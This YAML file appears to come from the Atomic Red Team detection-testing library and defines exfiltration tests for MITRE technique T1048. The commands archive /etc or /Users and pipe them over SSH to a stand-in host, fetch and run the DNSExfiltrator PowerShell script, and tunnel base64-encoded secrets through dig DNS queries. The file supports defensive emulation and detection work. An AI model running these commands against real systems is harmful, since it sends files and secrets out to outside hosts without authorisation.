Atomic Red Team doc generator
131 lines
4.9 KiB
YAML
131 lines
4.9 KiB
YAML
attack_technique: T1048
|
|
display_name: Exfiltration Over Alternative Protocol
|
|
atomic_tests:
|
|
- name: Exfiltration Over Alternative Protocol - SSH
|
|
auto_generated_guid: f6786cc8-beda-4915-a4d6-ac2f193bb988
|
|
description: |
|
|
Input a domain and test Exfiltration over SSH
|
|
|
|
Remote to Local
|
|
|
|
Upon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) writing a tar.gz file.
|
|
supported_platforms:
|
|
- macos
|
|
- linux
|
|
input_arguments:
|
|
domain:
|
|
description: target SSH domain
|
|
type: url
|
|
default: target.example.com
|
|
executor:
|
|
command: |
|
|
ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
|
|
name: sh
|
|
- name: Exfiltration Over Alternative Protocol - SSH
|
|
auto_generated_guid: 7c3cb337-35ae-4d06-bf03-3032ed2ec268
|
|
description: |
|
|
Input a domain and test Exfiltration over SSH
|
|
|
|
Local to Remote
|
|
|
|
Upon successful execution, tar will compress /Users/* directory and password protect the file modification of `Users.tar.gz.enc` as output.
|
|
supported_platforms:
|
|
- macos
|
|
- linux
|
|
input_arguments:
|
|
user_name:
|
|
description: username for domain
|
|
type: string
|
|
default: atomic
|
|
password:
|
|
description: password for user
|
|
type: string
|
|
default: atomic
|
|
domain:
|
|
description: target SSH domain
|
|
type: url
|
|
default: target.example.com
|
|
executor:
|
|
command: |
|
|
tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
|
|
name: sh
|
|
- name: DNSExfiltration (doh)
|
|
auto_generated_guid: c943d285-ada3-45ca-b3aa-7cd6500c6a48
|
|
description: |
|
|
DNSExfiltrator enables the transfer (exfiltration) of a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.
|
|
!!! Test will fail without a domain under your control with A record and NS record !!!
|
|
See this github page for more details - https://github.com/Arno0x/DNSExfiltrator
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
password:
|
|
description: Password used to encrypt the data to be exfiltrated
|
|
type: string
|
|
default: atomic
|
|
domain:
|
|
description: The domain name to use for DNS requests
|
|
type: string
|
|
default: target.example.com
|
|
ps_module:
|
|
description: DNSExfiltrator powershell ps_module
|
|
type: path
|
|
default: 'PathToAtomicsFolder\..\ExternalPayloads\dnsexfil.ps1'
|
|
doh:
|
|
description: Google or CloudFlare DoH (DNS over HTTP) server
|
|
type: string
|
|
default: google
|
|
time:
|
|
description: The time in milliseconds to wait between each DNS request
|
|
type: string
|
|
default: "500"
|
|
encoding:
|
|
description: Set to '-b32' to use base32 encoding of data. Might be required by some DNS resolvers.
|
|
type: string
|
|
default:
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
DNSExfiltrator powershell file must exist on disk at specified location (#{ps_module})
|
|
prereq_command: |
|
|
if (Test-Path "#{ps_module}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
|
IWR "https://raw.githubusercontent.com/Arno0x/DNSExfiltrator/8faa972408b0384416fffd5b4d42a7aa00526ca8/Invoke-DNSExfiltrator.ps1" -OutFile "#{ps_module}"
|
|
executor:
|
|
command: |
|
|
Import-Module "#{ps_module}"
|
|
Invoke-DNSExfiltrator -i "#{ps_module}" -d #{domain} -p #{password} -doh #{doh} -t #{time} #{encoding}
|
|
name: powershell
|
|
- name: Exfiltrate Data using DNS Queries via dig
|
|
auto_generated_guid: a27916da-05f2-4316-a3ee-feec67a437be
|
|
description: |
|
|
This test demonstrates how an attacker can exfiltrate sensitive information by encoding it as a subdomain (using base64 encoding) and
|
|
making DNS queries via the dig command to a controlled DNS server.
|
|
supported_platforms:
|
|
- macos
|
|
- linux
|
|
input_arguments:
|
|
dns_port:
|
|
type: integer
|
|
default: '53'
|
|
description: Attacker's DNS server port
|
|
attacker_dns_server:
|
|
type: string
|
|
default: 8.8.8.8
|
|
description: Attacker's DNS server address
|
|
secret_info:
|
|
type: string
|
|
default: this is a secret info
|
|
description: secret info that will be exfiltirated
|
|
dependency_executor_name: bash
|
|
dependencies:
|
|
- description: dig command
|
|
prereq_command: which dig
|
|
get_prereq_command: |
|
|
which apt && sudo apt update && sudo apt install -y bind9-dnsutils || which yum && sudo yum install -y bind-utils || which dnf && sudo dnf install -y bind-utils || which apk && sudo apk add bind-tools || which pkg && sudo pkg update && sudo pkg install -y bind-tools || which brew && brew update && brew install --quiet bind
|
|
executor:
|
|
command: |
|
|
dig @#{attacker_dns_server} -p #{dns_port} $(echo "#{secret_info}" | base64).google.com
|
|
name: bash
|
|
elevation_required: false
|